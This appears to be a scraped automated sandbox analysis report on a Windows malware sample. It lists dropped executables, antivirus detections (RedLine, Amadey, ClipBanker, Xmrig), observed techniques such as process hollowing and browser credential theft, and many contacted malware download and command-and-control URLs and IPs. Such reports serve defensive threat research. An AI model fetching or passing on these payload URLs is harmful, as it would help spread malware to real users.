79 C:\Users\user\AppData\Local\Temp\F42F.exe, PE32 19->79 dropped 81 11 other malicious files 19->81 dropped 147 System process connects to network (likely due to code injection or exploit) 19->147 149 Benign windows process drops PE files 19->149 151 Deletes itself after installation 19->151 153 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->153 26 9721.exe 19->26         started        29 E3B7.exe 19->29         started        32 46F.exe 19->32         started        34 8 other processes 19->34 115 api.2ip.ua 24->115 file8 signatures9 process10 file11 173 Detected unpacking (changes PE section rights) 26->173 175 Detected unpacking (overwrites its own PE header) 26->175 177 Machine Learning detection for dropped file 26->177 191 2 other signatures 26->191 36 9721.exe 1 15 26->36         started        91 C:\Users\user\AppData\Local\...\oldplayer.exe, PE32 29->91 dropped 93 C:\Users\user\AppData\Local\Temp\aafg31.exe, PE32+ 29->93 dropped 95 C:\Users\user\AppData\Local\...\XandETC.exe, PE32+ 29->95 dropped 179 Antivirus detection for dropped file 29->179 181 Multi AV Scanner detection for dropped file 29->181 40 oldplayer.exe 29->40         started        43 aafg31.exe 29->43         started        183 Injects a PE file into a foreign processes 32->183 45 46F.exe 32->45         started        185 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 34->185 187 Maps a DLL or memory area into another process 34->187 189 Sample uses process hollowing technique 34->189 193 2 other signatures 34->193 47 124D.exe 12 34->47         started        49 F42F.exe 34->49         started        51 6E6C.exe 34->51         started        53 3 other processes 34->53 signatures12 process13 dnsIp14 119 api.2ip.ua 162.0.217.254, 443, 49698, 49699 ACPCA Canada 36->119 83 C:\Users\user\AppData\Local\...\9721.exe, PE32 36->83 dropped 55 9721.exe 36->55         started        58 icacls.exe 36->58         started        85 C:\Users\user\AppData\Local\...\oneetx.exe, PE32 40->85 dropped 165 Antivirus detection for dropped file 40->165 167 Multi AV Scanner detection for dropped file 40->167 169 Machine Learning detection for dropped file 40->169 121 us.imgjeoigaa.com 154.221.19.146, 49717, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Seychelles 43->121 123 as.imgjeoigaa.com 39.109.117.57 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong 43->123 87 C:\Users\...\e5e3adb0db601d775ac97503f6b61728, SQLite 43->87 dropped 171 Tries to harvest and steal browser information (history, passwords, etc) 43->171 60 46F.exe 45->60         started        file15 signatures16 process17 signatures18 163 Injects a PE file into a foreign processes 55->163 62 9721.exe 55->62         started        67 46F.exe 60->67         started        process19 dnsIp20 125 zexeq.com 181.63.252.68, 49706, 49716, 80 TelmexColombiaSACO Colombia 62->125 127 190.229.19.7, 49707, 80 TelecomArgentinaSAAR Argentina 62->127 133 2 other IPs or domains 62->133 97 C:\Users\user\AppData\Local\...\build3[1].exe, PE32 62->97 dropped 99 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 62->99 dropped 101 C:\Users\user\AppData\Local\...\build3.exe, PE32 62->101 dropped 107 6 other malicious files 62->107 dropped 137 Modifies existing user documents (likely ransomware behavior) 62->137 69 build2.exe 62->69         started        72 build3.exe 62->72         started        129 colisumy.com 67->129 131 186.182.55.44, 49712, 80 TechtelLMDSComunicacionesInteractivasSAAR Argentina 67->131 135 2 other IPs or domains 67->135 103 C:\Users\user\AppData\Local\...\build3.exe, PE32 67->103 dropped 105 C:\Users\user\AppData\Local\...\build2.exe, PE32 67->105 dropped file21 signatures22 process23 file24 155 Multi AV Scanner detection for dropped file 69->155 157 Machine Learning detection for dropped file 69->157 159 Sample uses process hollowing technique 69->159 89 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 72->89 dropped 161 Antivirus detection for dropped file 72->161 signatures25

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe35%ReversingLabsWin32.Trojan.Generic
                file.exe41%VirustotalBrowse
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\Temp\oldplayer.exe100%AviraHEUR/AGEN.1317762
                C:\Users\user\AppData\Local\Temp\1543.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\Temp\E3B7.exe100%AviraHEUR/AGEN.1357339
                C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe100%AviraHEUR/AGEN.1317762
                C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe100%AviraTR/Crypt.XPACK.Gen8
                C:\Users\user\AppData\Local\Temp\XandETC.exe100%AviraHEUR/AGEN.1329655
                C:\Users\user\AppData\Local\Temp\oldplayer.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\A843.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\46F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build2[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\uwjrhss100%Joe Sandbox ML
                C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\4C9F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\1543.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\124D.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\F42F.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6E6C.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\AB42.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\E3B7.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\tgjrhss100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\3971.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\9721.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build2.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build2.exe58%ReversingLabsWin32.Trojan.RedLine
                C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe58%ReversingLabsWin32.Trojan.RedLine
                C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build2[1].exe58%ReversingLabsWin32.Trojan.RedLine
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Local\Temp\124D.exe38%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\1543.exe88%ReversingLabsByteCode-MSIL.Trojan.Zilla
                C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe96%ReversingLabsWin32.Trojan.Amadey
                C:\Users\user\AppData\Local\Temp\3971.exe38%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\46F.exe38%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\E3B7.exe88%ReversingLabsByteCode-MSIL.Trojan.Zilla
                C:\Users\user\AppData\Local\Temp\F42F.exe38%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\XandETC.exe73%ReversingLabsWin64.Coinminer.Xmrig
                C:\Users\user\AppData\Local\Temp\aafg31.exe35%ReversingLabsWin64.Adware.RedCap
                C:\Users\user\AppData\Local\Temp\oldplayer.exe96%ReversingLabsWin32.Trojan.Amadey
                C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe88%ReversingLabsWin32.Trojan.ClipBanker
                C:\Users\user\AppData\Roaming\uwjrhss35%ReversingLabsWin32.Trojan.Generic
                No Antivirus matches
                SourceDetectionScannerLabelLink
                toobussy.com12%VirustotalBrowse
                colisumy.com23%VirustotalBrowse
                astoriaresidency.com6%VirustotalBrowse
                potunulit.org25%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://potunulit.org/0%URL Reputationsafe
                https://shsplatform.co.uk/tmp/index.php0%URL Reputationsafe
                http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
                http://colisumy.com/dl/build2.exe$run100%URL Reputationmalware
                http://soryytlic4.net/0%URL Reputationsafe
                http://tolilolihul.net/0%URL Reputationsafe
                http://zexeq.com/lancer/get.php0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
                http://novanosa5org.org/0%URL Reputationsafe
                http://golilopaster.org/0%URL Reputationsafe
                http://zexeq.com/raud/get.php100%URL Reputationmalware
                http://hutnilior.net/0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exerun100%URL Reputationmalware
                http://otriluyttn.org/0%URL Reputationsafe
                http://as.imgjeoigaa.com/check/safe0%URL Reputationsafe
                http://bulimu55t.net/0%URL Reputationsafe
                http://nuljjjnuli.org/0%URL Reputationsafe
                http://colisumy.com/dl/build.exe100%URL Reputationmalware
                http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
                http://colisumy.com/dl/build2.exe100%URL Reputationmalware
                http://us.imgjeoigaa.com/sts/imagc.jpg0%URL Reputationsafe
                http://somatoka51hub.net/0%URL Reputationsafe
                http://hujukui3.net/0%URL Reputationsafe
                http://toobussy.com/tmp/0%URL Reputationsafe
                http://www.wikipedia.com/0%URL Reputationsafe
                http://bukubuka1.net/0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exe0%URL Reputationsafe
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                http://colisumy.com/dl/build2.exeruned57Q100%Avira URL Cloudmalware
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueX100%Avira URL Cloudmalware
                http://newzelannd66.org/0%URL Reputationsafe
                http://as.imgjeoigaa.com/check/?sid=96310&key=aa6f55198e3f46ac1c8cf076320ddea0100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96284&key=24861507852bad85284d69022e85886c100%Avira URL Cloudmalware
                https://astoriaresidency.com/tmp/index.php0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.php0100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96208&key=227c6fc9449cfe3c9f4c724f3db9a31c100%Avira URL Cloudmalware
                https://we.tl/t-vKvLYNOV0%Avira URL Cloudsafe
                https://we.tl/t-vKvLYNOV9o0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exeG100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exeW100%Avira URL Cloudmalware
                http://colisumy.com/dl/build2.exerun0a2c100%Avira URL Cloudmalware
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true100%Avira URL Cloudmalware
                5.42.65.80/8bmeVwqx/index.php100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96274&key=9871b54c626752ba88e7b6e5c02b2e5c100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96258&key=02c43f8de48edc98e314a991a9a53167100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96300&key=cd8038b120ac558b521ed1acd844b6e9100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runo100%Avira URL Cloudmalware
                http://zexeq.com/100%Avira URL Cloudmalware
                http://zexeq.com/lancer/get.phpn100%Avira URL Cloudmalware
                http://zexeq.com/lancer/get.phpp100%Avira URL Cloudmalware
                http://as.imgjeoigaa.com/check/?sid=96214&key=e4f0ccf8f99814617f7408b4efdac436100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe02100%Avira URL Cloudmalware
                http://zexeq.com/raud/get.phpep100%Avira URL Cloudmalware
                http://45.9.74.80/wall.exe100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exeruna2cG100%Avira URL Cloudmalware
                https://we.tl/t-vKvLYNOVH0%Avira URL Cloudsafe
                http://as.imgjeoigaa.com/check/?sid=96240&key=deff0eaee8fdc312425fe215c7a4b183100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runD100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exerund57100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                toobussy.com
                92.83.236.139
                truetrueunknown
                colisumy.com
                211.168.53.110
                truetrueunknown
                astoriaresidency.com
                103.233.24.19
                truetrueunknown
                potunulit.org
                188.114.96.7
                truetrueunknown
                api.2ip.ua
                162.0.217.254
                truefalse
                  high
                  shsplatform.co.uk
                  80.66.203.53
                  truetrue
                    unknown
                    as.imgjeoigaa.com
                    39.109.117.57
                    truefalse
                      unknown
                      zexeq.com
                      181.63.252.68
                      truetrue
                        unknown
                        us.imgjeoigaa.com
                        154.221.19.146
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://potunulit.org/true
                          • URL Reputation: safe
                          unknown
                          5.42.65.80/8bmeVwqx/index.phptrue
                          • Avira URL Cloud: malware
                          low
                          https://shsplatform.co.uk/tmp/index.phptrue
                          • URL Reputation: safe
                          unknown
                          http://as.imgjeoigaa.com/check/?sid=96284&key=24861507852bad85284d69022e85886ctrue
                          • Avira URL Cloud: malware
                          unknown
                          http://soryytlic4.net/true
                          • URL Reputation: safe
                          unknown
                          http://tolilolihul.net/true
                          • URL Reputation: safe
                          unknown
                          http://as.imgjeoigaa.com/check/?sid=96310&key=aa6f55198e3f46ac1c8cf076320ddea0true
                          • Avira URL Cloud: malware
                          unknown
                          http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                          • Avira URL Cloud: malware
                          unknown
                          http://novanosa5org.org/true
                          • URL Reputation: safe
                          unknown
                          https://astoriaresidency.com/tmp/index.phptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://as.imgjeoigaa.com/check/?sid=96208&key=227c6fc9449cfe3c9f4c724f3db9a31cfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://golilopaster.org/true
                          • URL Reputation: safe
                          unknown
                          http://zexeq.com/raud/get.phptrue
                          • URL Reputation: malware
                          unknown
                          http://hutnilior.net/true
                          • URL Reputation: safe
                          unknown
                          http://as.imgjeoigaa.com/check/?sid=96274&key=9871b54c626752ba88e7b6e5c02b2e5cfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://as.imgjeoigaa.com/check/?sid=96258&key=02c43f8de48edc98e314a991a9a53167false
                          • Avira URL Cloud: malware
                          unknown
                          https://t.me/headlistfalse
                            high
                            http://otriluyttn.org/true
                            • URL Reputation: safe
                            unknown
                            http://as.imgjeoigaa.com/check/safefalse
                            • URL Reputation: safe
                            unknown
                            http://bulimu55t.net/true
                            • URL Reputation: safe
                            unknown
                            http://as.imgjeoigaa.com/check/?sid=96300&key=cd8038b120ac558b521ed1acd844b6e9false
                            • Avira URL Cloud: malware
                            unknown
                            http://nuljjjnuli.org/true
                            • URL Reputation: safe
                            unknown
                            http://colisumy.com/dl/build.exetrue
                            • URL Reputation: malware
                            unknown
                            http://colisumy.com/dl/build2.exetrue
                            • URL Reputation: malware
                            unknown
                            http://as.imgjeoigaa.com/check/?sid=96214&key=e4f0ccf8f99814617f7408b4efdac436false
                            • Avira URL Cloud: malware
                            unknown
                            http://45.9.74.80/wall.exetrue
                            • Avira URL Cloud: malware
                            unknown
                            https://steamcommunity.com/profiles/76561199235044780false
                              high
                              https://api.2ip.ua/geo.jsonfalse
                                high
                                http://us.imgjeoigaa.com/sts/imagc.jpgfalse
                                • URL Reputation: safe
                                unknown
                                http://somatoka51hub.net/true
                                • URL Reputation: safe
                                unknown
                                http://hujukui3.net/true
                                • URL Reputation: safe
                                unknown
                                http://toobussy.com/tmp/true
                                • URL Reputation: safe
                                unknown
                                http://as.imgjeoigaa.com/check/?sid=96240&key=deff0eaee8fdc312425fe215c7a4b183false
                                • Avira URL Cloud: malware
                                unknown
                                http://bukubuka1.net/true
                                • URL Reputation: safe
                                unknown
                                http://zexeq.com/files/1/build3.exetrue
                                • URL Reputation: safe
                                unknown
                                http://newzelannd66.org/true
                                • URL Reputation: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://colisumy.com/dl/build2.exerun0a2c9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000003.00000000.568006829.00007FF883839000.00000002.00000001.01000000.00000007.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueX9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://colisumy.com/dl/build2.exe$run46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmptrue
                                • URL Reputation: malware
                                unknown
                                http://colisumy.com/dl/build2.exeruned57Q46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://zexeq.com/files/1/build3.exeW9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://api.2ip.ua/geo.json-46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.amazon.com/9721.exe, 00000014.00000003.668701027.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    http://zexeq.com/lancer/get.php46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.2ip.ua/geo.json)F42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://api.2ip.ua/geo.jsonalFD9721.exe, 0000001D.00000002.686758804.00000000006C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://api.2ip.ua/geo.jsonal124D.exe, 00000008.00000002.641151077.00000000005A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://zexeq.com/files/1/build3.exe$run46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          unknown
                                          http://www.twitter.com/9721.exe, 00000014.00000003.668978838.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://api.2ip.ua/geo.jsonPp6E6C.exe, 00000017.00000002.661648739.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.openssl.org/support/faq.html9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://api.2ip.ua/geo.jsonJ)1124D.exe, 00000008.00000002.641151077.00000000005D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://zexeq.com/files/1/build3.exeG46F.exe, 00000019.00000002.798522186.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error9721.exe, 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://zexeq.com/raud/get.php09721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://we.tl/t-vKvLYNOV9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000737000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://we.tl/t-vKvLYNOV9o9721.exe, 00000014.00000002.798394056.0000000000755000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798522186.0000000000737000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.800680210.00000000031E0000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://api.2ip.ua/geo.jsons124D.exe, 00000008.00000002.641151077.00000000005A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.2ip.ua/l124D.exe, 00000008.00000002.641151077.00000000005D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://zexeq.com/files/1/build3.exerun9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • URL Reputation: malware
                                                      unknown
                                                      http://www.reddit.com/9721.exe, 00000014.00000003.668951760.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.2ip.ua/s6E6C.exe, 00000017.00000002.661648739.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe09721.exe, 00000014.00000002.798394056.000000000076F000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://zexeq.com/files/1/build3.exe$runo46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.nytimes.com/9721.exe, 00000014.00000003.668912801.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.2ip.ua/9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686758804.00000000006C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0246F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://zexeq.com/lancer/get.phpp46F.exe, 00000019.00000002.798522186.000000000070F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://zexeq.com/lancer/get.phpn46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://api.2ip.ua/geo.jsonR46F.exe, 00000019.00000003.667507188.00000000006D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000003.00000000.568006829.00007FF883839000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://zexeq.com/9721.exe, 00000014.00000002.799748470.00000000030B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://api.2ip.ua/geo.jsonmF42F.exe, 0000000F.00000002.652053419.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.2ip.ua/geo.jsonlF42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.2ip.ua/geo.jsonh124D.exe, 00000008.00000002.641151077.00000000005A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.2ip.ua/geo.jsonk9721.exe, 00000014.00000003.657203262.000000000070F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.2ip.ua/geo.jsonT;9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.2ip.ua/geo.jsong9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.2ip.ua/geo.jsonaF42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://zexeq.com/raud/get.phpep9721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://api.2ip.ua/geo.json59721.exe, 0000001D.00000002.686758804.00000000006C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.2ip.ua/geo.jsonXM46F.exe, 0000000D.00000002.660779350.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.2ip.ua/geo.jsonXL46F.exe, 0000000D.00000002.660779350.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.youtube.com/9721.exe, 00000014.00000003.669045171.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.2ip.ua/geo.json1F42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://zexeq.com/files/1/build3.exeruna2cG46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://api.2ip.ua/geo.jsonindo9721.exe, 0000001A.00000002.708214028.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.wikipedia.com/9721.exe, 00000014.00000003.669007990.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://api.2ip.ua/geo.jsonI6E6C.exe, 00000017.00000002.661648739.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.live.com/9721.exe, 00000014.00000003.668881844.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://api.2ip.ua/geo.jsondlllF42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://we.tl/t-vKvLYNOVH46F.exe, 00000019.00000002.798522186.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://zexeq.com/files/1/build3.exerund579721.exe, 00000014.00000002.798394056.000000000070D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
